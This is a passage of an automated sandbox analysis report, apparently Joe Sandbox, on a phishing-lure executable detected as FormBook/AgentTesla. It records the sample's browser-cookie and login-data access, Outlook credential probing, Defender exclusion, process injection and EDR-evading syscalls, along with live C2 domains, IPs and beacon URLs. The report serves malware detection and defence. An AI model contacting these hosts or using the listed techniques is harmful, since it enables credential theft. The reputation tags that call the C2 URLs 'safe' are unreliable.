            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Users\user\AppData\Roaming\YybGLWQSx.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\setx.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446732 Sample: DHL_Delivery Documents.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 55 www.uzonedich.com 2->55 57 www.prospin.click 2->57 59 3 other IPs or domains 2->59 69 Snort IDS alert for network traffic 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 Sigma detected: Scheduled temp file as task from temp location 2->73 75 11 other signatures 2->75 10 DHL_Delivery Documents.exe 7 2->10         started        14 YybGLWQSx.exe 5 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\YybGLWQSx.exe, PE32 10->51 dropped 53 C:\Users\user\AppData\Local\...\tmp3106.tmp, XML 10->53 dropped 85 Adds a directory exclusion to Windows Defender 10->85 16 DHL_Delivery Documents.exe 10->16         started        19 powershell.exe 23 10->19         started        21 powershell.exe 23 10->21         started        23 schtasks.exe 1 10->23         started        87 Multi AV Scanner detection for dropped file 14->87 89 Machine Learning detection for dropped file 14->89 25 schtasks.exe 1 14->25         started        27 YybGLWQSx.exe 14->27         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 16->65 29 OoIHIwIlaOHZFTFWeSHYCjEJ.exe 16->29 injected 67 Loading BitLocker PowerShell Module 19->67 32 WmiPrvSE.exe 19->32         started        34 conhost.exe 19->34         started        36 conhost.exe 21->36         started        38 conhost.exe 23->38         started        40 conhost.exe 25->40         started        process9 signatures10 91 Found direct / indirect Syscall (likely to bypass EDR) 29->91 42 setx.exe 13 29->42         started        process11 signatures12 77 Tries to steal Mail credentials (via file / registry access) 42->77 79 Tries to harvest and steal browser information (history, passwords, etc) 42->79 81 Modifies the context of a thread in another process (thread injection) 42->81 83 2 other signatures 42->83 45 OoIHIwIlaOHZFTFWeSHYCjEJ.exe 42->45 injected 49 firefox.exe 42->49         started        process13 dnsIp14 61 www.uzonedich.com 103.48.135.8, 49710, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Hong Kong 45->61 63 www.alexbruma.com 172.67.214.17, 49711, 49712, 49713 CLOUDFLARENETUS United States 45->63 93 Found direct / indirect Syscall (likely to bypass EDR) 45->93 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            DHL_Delivery Documents.exe55%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            DHL_Delivery Documents.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\YybGLWQSx.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\YybGLWQSx.exe55%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://tempuri.org/DataSet1.xsd0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.uzonedich.com/ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI0%Avira URL Cloudsafe
            http://www.alexbruma.com/0eyj/0%Avira URL Cloudsafe
            http://www.alexbruma.com/0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI0%Avira URL Cloudsafe
            http://www.alexbruma.com0%Avira URL Cloudsafe
            http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.Resources0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.uzonedich.com
            		103.48.135.8
            		truetrue
              		unknown
              www.alexbruma.com
              		172.67.214.17
              		truefalse
                		unknown
                www.prospin.click
                		unknown
                		unknowntrue
                  		unknown
                  www.bookingshop01.top
                  		unknown
                  		unknowntrue
                    		unknown
                    www.7egiy1.cfd
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.alexbruma.com/0eyj/false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.uzonedich.com/ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdItrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.alexbruma.com/0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdIfalse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ac.ecosia.org/autocomplete?q=setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://duckduckgo.com/chrome_newtabsetx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://tempuri.org/registerationDataSet.xsdOAsnanyDentalClinic.Properties.ResourcesDHL_Delivery Documents.exe, YybGLWQSx.exe.0.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icosetx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://tempuri.org/DataSet1.xsdDHL_Delivery Documents.exe, YybGLWQSx.exe.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.alexbruma.comOoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3282139682.0000000004CE1000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.ecosia.org/newtab/setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDHL_Delivery Documents.exe, 00000000.00000002.2080507854.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, YybGLWQSx.exe, 00000009.00000002.2305807020.00000000024D7000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setx.exe, 00000012.00000003.2893998429.0000000007578000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      172.67.214.17
                      		www.alexbruma.comUnited States
                      		13335CLOUDFLARENETUSfalse
                      103.48.135.8
                      		www.uzonedich.comHong Kong
                      		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446732
                      Start date and time:2024-05-23 20:26:54 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 10s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
